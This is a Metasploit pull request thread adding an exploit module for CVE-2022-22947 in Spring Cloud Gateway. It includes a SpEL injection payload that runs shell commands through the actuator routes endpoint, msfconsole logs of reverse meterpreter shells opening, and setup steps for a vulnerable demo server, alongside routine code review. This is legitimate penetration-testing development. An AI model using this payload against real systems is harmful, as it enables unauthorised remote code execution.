Adding CVE-2022-22947 Spring Cloud Gateway RCE Exploit
rapid7/metasploit-framework pull request #17116
Opened 2022-10-06 19:51 UTC by Ayantaker

CVE-2022-22947 exploits Spring Cloud Gateway. The module has been tested with Spring Cloud gateway version 3.1.0 on Linux kali 5.18.0-kali5-amd64

This module exploits a Remote Code Execution vulnerability in Spring Cloud Gateway versions = 3.1.0 and 3.0.0 to 3.0.6.
The vulnerability can be exploited when the Gateway Actuator endpoint is enabled, exposed and unsecured.
An attacker can use SpEL expressions to execute code and take control of the victim machine. This module only supports Linux Droppers.

The module has been tested with Spring Cloud gateway version 3.1.0 on Linux kali 5.18.0-kali5-amd64

## Verification

List the steps needed to make sure this thing works

- [ ] Start `msfconsole`
- [ ] `use exploit/linux/http/spring_cloud_gateway_rce`
- [ ] `set RHOSTS <server_ip>`
- [ ] `set RPORT 9000`
- [ ] `set payload linux/x64/meterpreter/reverse_tcp`
- [ ] `run`
- [ ] **Verify** A meterpreter shell should pop up

## Scenarios

```
msf6 > use exploit/linux/http/spring_cloud_gateway_rce
[*] Using configured payload linux/x64/meterpreter/reverse_tcp
msf6 exploit(linux/http/spring_cloud_gateway_rce) > set RHOSTS 192.168.19.140
RHOSTS => 192.168.19.140
msf6 exploit(linux/http/spring_cloud_gateway_rce) > set RPORT 9000
RPORT => 9000
msf6 exploit(linux/http/spring_cloud_gateway_rce) > run

[*] Started reverse TCP handler on 192.168.19.140:4444 
[*] Running automatic check ("set AutoCheck false" to disable)
[*] Checking if server vulnerable
[+] Route deleted
[+] The target is vulnerable.
[+] Created route successfully with the reverse shell
[*] Trigerring reverse shell
[*] Sending stage (3020772 bytes) to 192.168.19.140
[*] Meterpreter session 1 opened (192.168.19.140:4444 -> 192.168.19.140:59916) at 2022-10-01 14:21:31 -0400
[+] Route deleted
[+] Enjoy your Shell

meterpreter >
```

## Vulnerable server for verification

```bash
# To use the pre-compiled vulnerable application
wget https://github.com/wdahlenburg/spring-gateway-demo/releases/download/v.0.0.1/spring-gateway-demo-0.0.1-SNAPSHOT.jar
sudo apt install default-jdk
java -jar spring-gateway-demo-0.0.1-SNAPSHOT.jar ## This will host the app on port 9000

# If you want to compile for a version of spring cloud gateway on your own
git clone https://github.com/wdahlenburg/spring-gateway-demo.git

## In pom.xml, change the version in '<spring-cloud.version>2021.0.1-SNAPSHOT</spring-cloud.version>'. To see which spring cloud version includes which version of spring cloud gateway, look here : https://repo1.maven.org/maven2/org/springframework/cloud/spring-cloud-dependencies/

apt install maven
mvn package -DskipTests
java -jar target/spring-gateway-demo-0.0.1-SNAPSHOT.jar ## This will host the app on port 9000
```

2022-10-06 19:57 UTC, Ayantaker commented
Linked PR with conversation : https://github.com/rapid7/metasploit-framework/pull/17094

2022-10-07 18:43 UTC, bwatters-r7 commented on modules/exploits/linux/http/spring_cloud_gateway_rce.rb
> +    })
```suggestion
    route_name = Rex::Text.rand_text_alpha(8).downcase
    uri = "/actuator/gateway/routes/#{route_name}"
    value = '#{new String(T(org.springframework.util.StreamUtils).copyToByteArray(T(java.lang.Runtime).getRuntime().exec(new String[]{"/bin/sh","-c", "' + cmd + '"}).getInputStream()))}'

    data = {
      'id' => route_name,
      'filters' => [
        {
          'name' => 'AddResponseHeader',
          'args' =>
            {
              'name' => 'Result',
              'value' => value
            }
        }
      ],
      'uri' => 'http://example.com'
    }

    res = send_request_cgi({
      'method' => 'POST',
      'uri' => normalize_uri(uri),
      'ctype' => 'application/json',
      'data' => JSON.generate(data)
    })

```
This change simplifies the json data value and with automatic escaping for quotation marks, it also lets us get rid of the extra base64 and shell calls.

2022-10-07 20:48 UTC, bwatters-r7 commented on modules/exploits/linux/http/spring_cloud_gateway_rce.rb
> +                'PAYLOAD' => 'cmd/unix/reverse_python_ssl'
```suggestion
                'PAYLOAD' => 'cmd/unix/python/meterpreter/reverse_tcp'
```
Also, the other payload does not support anything but `python` in the path this payload will work on `python`, `python2`, and `python3`

2022-10-07 20:57 UTC, Ayantaker commented
Thanks yes this seems much more cleaner.

2022-10-07 21:43 UTC, bwatters-r7 commented
@msjenkins-r7 test this, please

2022-10-07 22:11 UTC, bwatters-r7 commented
@Ayantaker, all tests are passing, but because we changed a lot of code from my suggestions I'd like to get a second person on our side to take a look before landing.  That might not happen until next week.
I wanted you to know the wait is on our side, so right now there's nothing you need to do.

2022-10-08 08:03 UTC, Ayantaker commented
> @Ayantaker, all tests are passing, but because we changed a lot of code from my suggestions I'd like to get a second person on our side to take a look before landing. That might not happen until next week. I wanted you to know the wait is on our side, so right now there's nothing you need to do.

Sure. works for me.

2022-10-11 18:25 UTC, bwatters-r7 commented
Glad someone else took a look- could you please run msftidy_docs on this and correct the documentation?
```
tmoose@ubuntu:~/rapid7/metasploit-framework$ tools/dev/msftidy_docs.rb documentation/modules/exploit/linux/http/spring_cloud_gateway_rce.md
documentation/modules/exploit/linux/http/spring_cloud_gateway_rce.md - [WARNING] Missing Section: ## Scenarios
documentation/modules/exploit/linux/http/spring_cloud_gateway_rce.md - [INFO] Missing Section: ## Options
documentation/modules/exploit/linux/http/spring_cloud_gateway_rce.md - [WARNING] Please add a newline at the end of the file
documentation/modules/exploit/linux/http/spring_cloud_gateway_rce.md - [WARNING] H2 headings in incorrect order. Should be: Vulnerable Application, Verification Steps, Options, Scenarios
documentation/modules/exploit/linux/http/spring_cloud_gateway_rce.md:3 - [WARNING] Line too long (240). Consider a newline (which resolves to a space in markdown) to break it up around 140 characters.
documentation/modules/exploit/linux/http/spring_cloud_gateway_rce.md:9 - [WARNING] Spaces at EOL
documentation/modules/exploit/linux/http/spring_cloud_gateway_rce.md:14 - [WARNING] No H1 (#) headers. If this is code, indent.
documentation/modules/exploit/linux/http/spring_cloud_gateway_rce.md:20 - [WARNING] No H1 (#) headers. If this is code, indent.
```

2022-10-11 20:04 UTC, gwillcox-r7 requested changes

2022-10-11 20:04 UTC, gwillcox-r7 commented on modules/exploits/linux/http/spring_cloud_gateway_rce.rb
> +    if res
This should be renamed from `res`. This is confusing and makes it sound like its the response object which it is not. It will either be `false` or the route name itself, not a HTTP response object like this naming suggests it is.

2022-10-11 20:04 UTC, gwillcox-r7 commented on modules/exploits/linux/http/spring_cloud_gateway_rce.rb
> +      'uri' => 'http://example.com'
```suggestion
      'uri' => "http://#{Rex::Text.rand_text_alphanumeric(6..15)}.com"
```
I'm fairly certain this could be randomized vs being a static string like this one.

2022-10-11 20:47 UTC, gwillcox-r7 commented on modules/exploits/linux/http/spring_cloud_gateway_rce.rb
> +      'uri' => 'http://example.com'
Fixed in https://github.com/rapid7/metasploit-framework/pull/17116/commits/45aa09411e050cbebb6eb1412c0b1bc32d047550

2022-10-11 20:47 UTC, gwillcox-r7 commented on modules/exploits/linux/http/spring_cloud_gateway_rce.rb
> +    if res
Fixed in https://github.com/rapid7/metasploit-framework/pull/17116/commits/45aa09411e050cbebb6eb1412c0b1bc32d047550

2022-10-11 20:47 UTC, gwillcox-r7 commented on modules/exploits/linux/http/spring_cloud_gateway_rce.rb
> +  ## Refresh the gateway to trigerr the routes with commands created
Fixed in https://github.com/rapid7/metasploit-framework/pull/17116/commits/45aa09411e050cbebb6eb1412c0b1bc32d047550

2022-10-11 20:47 UTC, gwillcox-r7 commented on modules/exploits/linux/http/spring_cloud_gateway_rce.rb
> +        'DisclosureDate' => '2022-03-03',
Fixed in https://github.com/rapid7/metasploit-framework/pull/17116/commits/45aa09411e050cbebb6eb1412c0b1bc32d047550

2022-10-11 20:47 UTC, gwillcox-r7 commented on modules/exploits/linux/http/spring_cloud_gateway_rce.rb
> +          ['URL', 'https://wya.pl/2022/02/26/cve-2022-22947-spel-casting-and-evil-beans/']
Links added in with https://github.com/rapid7/metasploit-framework/pull/17116/commits/45aa09411e050cbebb6eb1412c0b1bc32d047550

2022-10-11 20:48 UTC, gwillcox-r7 commented on modules/exploits/linux/http/spring_cloud_gateway_rce.rb
> +          This module exploits a Remote Code Execution vulnerability in Spring Cloud Gateway versions = 3.1.0 and 3.0.0 to 3.0.6.
Fixed with https://github.com/rapid7/metasploit-framework/pull/17116/commits/45aa09411e050cbebb6eb1412c0b1bc32d047550

2022-10-11 20:48 UTC, gwillcox-r7 commented on documentation/modules/exploit/linux/http/spring_cloud_gateway_rce.md
> +[+] Enjoy your Shell
Fixed with https://github.com/rapid7/metasploit-framework/pull/17116/commits/45aa09411e050cbebb6eb1412c0b1bc32d047550

2022-10-11 20:48 UTC, gwillcox-r7 commented on modules/exploits/linux/http/spring_cloud_gateway_rce.rb
> +    print_status('Trigerring command')
Fixed with https://github.com/rapid7/metasploit-framework/pull/17116/commits/45aa09411e050cbebb6eb1412c0b1bc32d047550

2022-10-11 20:48 UTC, gwillcox-r7 commented on documentation/modules/exploit/linux/http/spring_cloud_gateway_rce.md
> +[*] Trigerring reverse shell
Fixed with https://github.com/rapid7/metasploit-framework/pull/17116/commits/45aa09411e050cbebb6eb1412c0b1bc32d047550

2022-10-11 20:48 UTC, gwillcox-r7 commented on documentation/modules/exploit/linux/http/spring_cloud_gateway_rce.md
> +### Spring Cloud gateway version 3.1.0 on Linux kali 5.18.0-kali5-amd64
Header added in with https://github.com/rapid7/metasploit-framework/pull/17116/commits/45aa09411e050cbebb6eb1412c0b1bc32d047550

2022-10-11 20:49 UTC, gwillcox-r7 commented on documentation/modules/exploit/linux/http/spring_cloud_gateway_rce.md
> +## Verification Steps
Header added in with https://github.com/rapid7/metasploit-framework/pull/17116/commits/45aa09411e050cbebb6eb1412c0b1bc32d047550

2022-10-11 20:49 UTC, gwillcox-r7 commented on documentation/modules/exploit/linux/http/spring_cloud_gateway_rce.md
> +This demo [project](https://github.com/wdahlenburg/spring-gateway-demo) can be used to run a vulnerable server
Fixed with https://github.com/rapid7/metasploit-framework/pull/17116/commits/45aa09411e050cbebb6eb1412c0b1bc32d047550

2022-10-11 20:49 UTC, gwillcox-r7 commented on documentation/modules/exploit/linux/http/spring_cloud_gateway_rce.md
> +The vulnerability exploits [CVE-2022-22947](https://nvd.nist.gov/vuln/detail/CVE-2022-22947) an RCE vulnerability in Spring Cloud Gateway. According to [VMware](https://tanzu.vmware.com/security/cve-
Fixed with https://github.com/rapid7/metasploit-framework/pull/17116/commits/45aa09411e050cbebb6eb1412c0b1bc32d047550

2022-10-11 22:20 UTC, Ayantaker commented
> Glad someone else took a look- could you please run msftidy_docs on this and correct the documentation?
> 
> ```
> tmoose@ubuntu:~/rapid7/metasploit-framework$ tools/dev/msftidy_docs.rb documentation/modules/exploit/linux/http/spring_cloud_gateway_rce.md
> documentation/modules/exploit/linux/http/spring_cloud_gateway_rce.md - [WARNING] Missing Section: ## Scenarios
> documentation/modules/exploit/linux/http/spring_cloud_gateway_rce.md - [INFO] Missing Section: ## Options
> documentation/modules/exploit/linux/http/spring_cloud_gateway_rce.md - [WARNING] Please add a newline at the end of the file
> documentation/modules/exploit/linux/http/spring_cloud_gateway_rce.md - [WARNING] H2 headings in incorrect order. Should be: Vulnerable Application, Verification Steps, Options, Scenarios
> documentation/modules/exploit/linux/http/spring_cloud_gateway_rce.md:3 - [WARNING] Line too long (240). Consider a newline (which resolves to a space in markdown) to break it up around 140 characters.
> documentation/modules/exploit/linux/http/spring_cloud_gateway_rce.md:9 - [WARNING] Spaces at EOL
> documentation/modules/exploit/linux/http/spring_cloud_gateway_rce.md:14 - [WARNING] No H1 (#) headers. If this is code, indent.
> documentation/modules/exploit/linux/http/spring_cloud_gateway_rce.md:20 - [WARNING] No H1 (#) headers. If this is code, indent.
> ```

Ahh didn't know there msftidy for docs. Does the automated tests not catch it?

2022-10-11 22:21 UTC, Ayantaker commented on modules/exploits/linux/http/spring_cloud_gateway_rce.rb
> +    })
> POST request with no data, yet the content type is set to `application/json` despite no content being sent? This looks odd, are you sure this is correct? Could this potentially also be done via a `GET` request given no data is being sent? If it needs to be a `POST` request, does taking out the `ctype` field make a difference?

Yes the POST is necessary but the content-type doesn't matter it seems

2022-10-11 22:23 UTC, Ayantaker commented on modules/exploits/linux/http/spring_cloud_gateway_rce.rb
> +    if res
> Your checking that the response is returned here but thats it. What if the response code is different? What if the response body is empty when your not expecting it to be? What if the server is different but responds with the same response code your expected server responds with? There are a number of cases here that need to be accounted for, not simply if the server responded at all.

So the run_command called in execute_method checks if the response received has status code 201 and also the message associated 'Created', else it will return Nil which would fail the check. Let me know if anything else is needed

2022-10-11 22:24 UTC, Ayantaker commented on modules/exploits/linux/http/spring_cloud_gateway_rce.rb
> +        'Arch' => [ARCH_X64, ARCH_CMD],
Umm, I am not have any x86 env to test it on handy

2022-10-12 05:07 UTC, gwillcox-r7 commented
> > Glad someone else took a look- could you please run msftidy_docs on this and correct the documentation?
> > ```
> > tmoose@ubuntu:~/rapid7/metasploit-framework$ tools/dev/msftidy_docs.rb documentation/modules/exploit/linux/http/spring_cloud_gateway_rce.md
> > documentation/modules/exploit/linux/http/spring_cloud_gateway_rce.md - [WARNING] Missing Section: ## Scenarios
> > documentation/modules/exploit/linux/http/spring_cloud_gateway_rce.md - [INFO] Missing Section: ## Options
> > documentation/modules/exploit/linux/http/spring_cloud_gateway_rce.md - [WARNING] Please add a newline at the end of the file
> > documentation/modules/exploit/linux/http/spring_cloud_gateway_rce.md - [WARNING] H2 headings in incorrect order. Should be: Vulnerable Application, Verification Steps, Options, Scenarios
> > documentation/modules/exploit/linux/http/spring_cloud_gateway_rce.md:3 - [WARNING] Line too long (240). Consider a newline (which resolves to a space in markdown) to break it up around 140 characters.
> > documentation/modules/exploit/linux/http/spring_cloud_gateway_rce.md:9 - [WARNING] Spaces at EOL
> > documentation/modules/exploit/linux/http/spring_cloud_gateway_rce.md:14 - [WARNING] No H1 (#) headers. If this is code, indent.
> > documentation/modules/exploit/linux/http/spring_cloud_gateway_rce.md:20 - [WARNING] No H1 (#) headers. If this is code, indent.
> > ```
> 
> Ahh didn't know there msftidy for docs. Does the automated tests not catch it?

Unfortunately not at the moment :/ I've asked the person who helps build the automation for this about this but he is on vacation at the moment. When he is back I'll see if we can get this added into the GitHub Action checks.

2022-10-12 05:13 UTC, gwillcox-r7 commented on modules/exploits/linux/http/spring_cloud_gateway_rce.rb
> +        'Arch' => [ARCH_X64, ARCH_CMD],
Hmm alright in that case might need to see if x86 installers are available but given most systems are likely to be x64 I don't think this will be a huge issue.

2022-10-12 13:01 UTC, bwatters-r7 commented on modules/exploits/linux/http/spring_cloud_gateway_rce.rb
> +                'PAYLOAD' => 'cmd/unix/python/meterpreter/reverse_tcp'
I'm not sure I could name a common distro in the last decade or two that does not have Python?  I'd strong agree if this were something we would see on an embedded device running busybox or a stripped-down host.  If you're super passionate about it, I could see it, but I'm not sure that's going to be something that becomes a problem, and even then, the user can change the payload.

2022-10-12 13:49 UTC, gwillcox-r7 commented on modules/exploits/linux/http/spring_cloud_gateway_rce.rb
> +                'PAYLOAD' => 'cmd/unix/python/meterpreter/reverse_tcp'
Fair point I just wanted to do a double check on that but I agree Python is fairly common and its fairly easy to change this. Marking resolved.

2022-10-12 13:49 UTC, gwillcox-r7 commented on documentation/modules/exploit/linux/http/spring_cloud_gateway_rce.md
> +Spring Cloud gateway version 3.1.0 on Linux kali 5.18.0-kali5-amd64**
Not sure what happened here but the previous variant was valid?

2022-10-12 13:51 UTC, gwillcox-r7 commented on documentation/modules/exploit/linux/http/spring_cloud_gateway_rce.md
> +## Installation Instructions
Previous variant was valid, this is technically not a header that msftidy_docs.rb recognizes so it must be placed as a H3 or lower header. No H1 headers are allowed according to msftidy_docs.rb.

2022-10-12 13:52 UTC, gwillcox-r7 commented
@Ayantaker Thanks for fixing those trailing spaces, those always get me 👍

2022-10-12 13:52 UTC, gwillcox-r7 commented on modules/exploits/linux/http/spring_cloud_gateway_rce.rb
> +    })
Fixed in https://github.com/rapid7/metasploit-framework/pull/17116/commits/e75438d0b2b485f7aa8fe083127f80f9fba1f472

2022-10-12 13:55 UTC, gwillcox-r7 commented on modules/exploits/linux/http/spring_cloud_gateway_rce.rb
> +        'Arch' => [ARCH_X64, ARCH_CMD],
Marking resolved due to above points.

2022-10-12 14:05 UTC, gwillcox-r7 commented on modules/exploits/linux/http/spring_cloud_gateway_rce.rb
> +    if res
Woops I see now that `execute_command` returns either `true` or `false` here. Also your point on `run_command` is valid so I'm going to mark this as resolved since this was a misunderstanding on my side.

2022-10-12 14:05 UTC, gwillcox-r7 approved these changes

2022-10-12 14:24 UTC, gwillcox-r7 commented
@Ayantaker Looks like we will just need to update the documentation to meet `msftidy_docs.rb` requirements and then this should be good to test and if all is good, then land in time for Thursday's release cut off.

2022-10-12 15:38 UTC, Ayantaker commented on documentation/modules/exploit/linux/http/spring_cloud_gateway_rce.md
> +## Installation Instructions
Fixed

2022-10-12 15:39 UTC, Ayantaker commented
> @Ayantaker Looks like we will just need to update the documentation to meet `msftidy_docs.rb` requirements and then this should be good to test and if all is good, then land in time for Thursday's release cut off.

Have fixed the documentation issues. Let me know if anything else is needed

2022-10-12 15:41 UTC, gwillcox-r7 commented
> > @Ayantaker Looks like we will just need to update the documentation to meet `msftidy_docs.rb` requirements and then this should be good to test and if all is good, then land in time for Thursday's release cut off.
> 
> Have fixed the documentation issues. Let me know if anything else is needed

Thanks for the quick response! Looks good to me, just need to test this on my end now, will let you know if anything else comes up 👍 Thanks for being so responsive on this, much appreciated!

2022-10-12 15:43 UTC, gwillcox-r7 approved these changes

2022-10-12 15:51 UTC, gwillcox-r7 commented on documentation/modules/exploit/linux/http/spring_cloud_gateway_rce.md
> +RPORT => 9000
Quick question but will this always run on port 9000? If so we can make this the default port.

2022-10-12 16:03 UTC, gwillcox-r7 commented
Seems to be working very well, nice work @Ayantaker!

```
msf6 exploit(linux/http/spring_cloud_gateway_rce) > show options

Module options (exploit/linux/http/spring_cloud_gateway_rce):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   Proxies                   no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS   192.168.153.128  yes       The target host(s), see https://github.com/rapid7/metasploit-framework/wi
                                       ki/Using-Metasploit
   RPORT    9000             yes       The target port (TCP)
   SRVHOST  0.0.0.0          yes       The local host or network interface to listen on. This must be an address
                                        on the local machine or 0.0.0.0 to listen on all addresses.
   SRVPORT  8080             yes       The local port to listen on.
   SSL      false            no        Negotiate SSL/TLS for outgoing connections
   SSLCert                   no        Path to a custom SSL certificate (default is randomly generated)
   URIPATH                   no        The URI to use for this exploit (default is random)
   VHOST                     no        HTTP server virtual host


Payload options (cmd/unix/python/meterpreter/reverse_tcp):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST                   yes       The listen address (an interface may be specified)
   LPORT  4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Unix Command


msf6 exploit(linux/http/spring_cloud_gateway_rce) > set LHOST 172.30.98.130 
LHOST => 172.30.98.130
msf6 exploit(linux/http/spring_cloud_gateway_rce) > run

[*] Started reverse TCP handler on 172.30.98.130:4444 
[*] Running automatic check ("set AutoCheck false" to disable)
[*] Checking if server is vulnerable
[*] Triggering code execution using routes
[+] Route deleted
[+] The target is vulnerable.
[*] Executing Unix Command for cmd/unix/python/meterpreter/reverse_tcp
[*] Triggering code execution using routes
[*] Sending stage (40164 bytes) to 172.30.96.1
[*] Meterpreter session 1 opened (172.30.98.130:4444 -> 172.30.96.1:38622) at 2022-10-12 11:00:45 -0500
[+] Route deleted


meterpreter > 
meterpreter > getuid
Server username: kali
meterpreter > sysinfo
Computer        : kali
OS              : Linux 5.18.0-kali5-amd64 #1 SMP PREEMPT_DYNAMIC Debian 5.18.5-1kali6 (2022-07-07)
Architecture    : x64
System Language : en_US
Meterpreter     : python/linux
meterpreter > pwd
/home/kali
meterpreter > exit
[*] Shutting down Meterpreter...

[*] 192.168.153.128 - Meterpreter session 1 closed.  Reason: User exit
msf6 exploit(linux/http/spring_cloud_gateway_rce) > run

[*] Started reverse TCP handler on 172.30.98.130:4444 
[*] Running automatic check ("set AutoCheck false" to disable)
[*] Checking if server is vulnerable
[*] Triggering code execution using routes
[+] Route deleted
[+] The target is vulnerable.
[*] Executing Unix Command for cmd/unix/python/meterpreter/reverse_tcp
[*] Triggering code execution using routes
[*] Sending stage (40164 bytes) to 172.30.96.1
[*] Meterpreter session 2 opened (172.30.98.130:4444 -> 172.30.96.1:38676) at 2022-10-12 11:01:34 -0500
[+] Route deleted

meterpreter > 
```

2022-10-12 16:04 UTC, gwillcox-r7 commented on modules/exploits/linux/http/spring_cloud_gateway_rce.rb
> +          'SideEffects' => [ ARTIFACTS_ON_DISK ]
This should be updated to also include IOCs in logs since this will cause binding validation errors in the log of the application we are targetting.

2022-10-12 16:20 UTC, gwillcox-r7 commented on modules/exploits/linux/http/spring_cloud_gateway_rce.rb
> +          'SideEffects' => [ ARTIFACTS_ON_DISK ]
Resolved in https://github.com/rapid7/metasploit-framework/pull/17116/commits/487a26ee0f2c5817826fb11e1b3ad9d7ce1e5f6a

2022-10-12 16:20 UTC, gwillcox-r7 commented on documentation/modules/exploit/linux/http/spring_cloud_gateway_rce.md
> +RPORT => 9000
Resolved in https://github.com/rapid7/metasploit-framework/pull/17116/commits/487a26ee0f2c5817826fb11e1b3ad9d7ce1e5f6a

2022-10-12 16:21 UTC, bwatters-r7 commented on documentation/modules/exploit/linux/http/spring_cloud_gateway_rce.md
> +RPORT => 9000
>All “pre” filter logic is executed. Then the proxy request is made. After the proxy request is made, the “post” filter logic is run. URIs defined in routes without a port get default port values of 80 and 443 for the HTTP and HTTPS URIs, respectively.

No; I believe 9000 is the default port on the demo that we're using for testing.

2022-10-12 16:29 UTC, bwatters-r7 commented on modules/exploits/linux/http/spring_cloud_gateway_rce.rb
> +          'SideEffects' => [ ARTIFACTS_ON_DISK ]
https://github.com/rapid7/metasploit-framework/pull/17094#discussion_r986253703

2022-10-12 16:31 UTC, bwatters-r7 commented on documentation/modules/exploit/linux/http/spring_cloud_gateway_rce.md
> +RPORT => 9000
I think that's just the default port for our demo for testing.  In some of the setup 
documentation, I see them suggesting 8080.  I don't see a true default port, though.

2022-10-12 16:54 UTC, merged

2022-10-12 16:56 UTC, gwillcox-r7 commented
# Release Notes
A new module has been added in for CVE-2022-22947, a unauthenticated RCE in Spring Cloud Gateway versions 3.1.0 and 3.0.0 to 3.0.6 when the Gateway Actuator endpoint is enabled, exposed and unsecured. Successful exploitation results in arbitrary code execution as the user running Spring Cloud Gateway.

2022-10-12 16:58 UTC, gwillcox-r7 commented
Thanks for your submission @Ayantaker, and congrats on your first PR! Was a pleasure working with you on this and I look forward to seeing more submissions from you should you choose to continue contributing😃

2022-10-13 15:24 UTC, Ayantaker commented
Thanks @bwatters-r7 and @gwillcox-r7 for all the help and the patience! It has been a please working with you guys!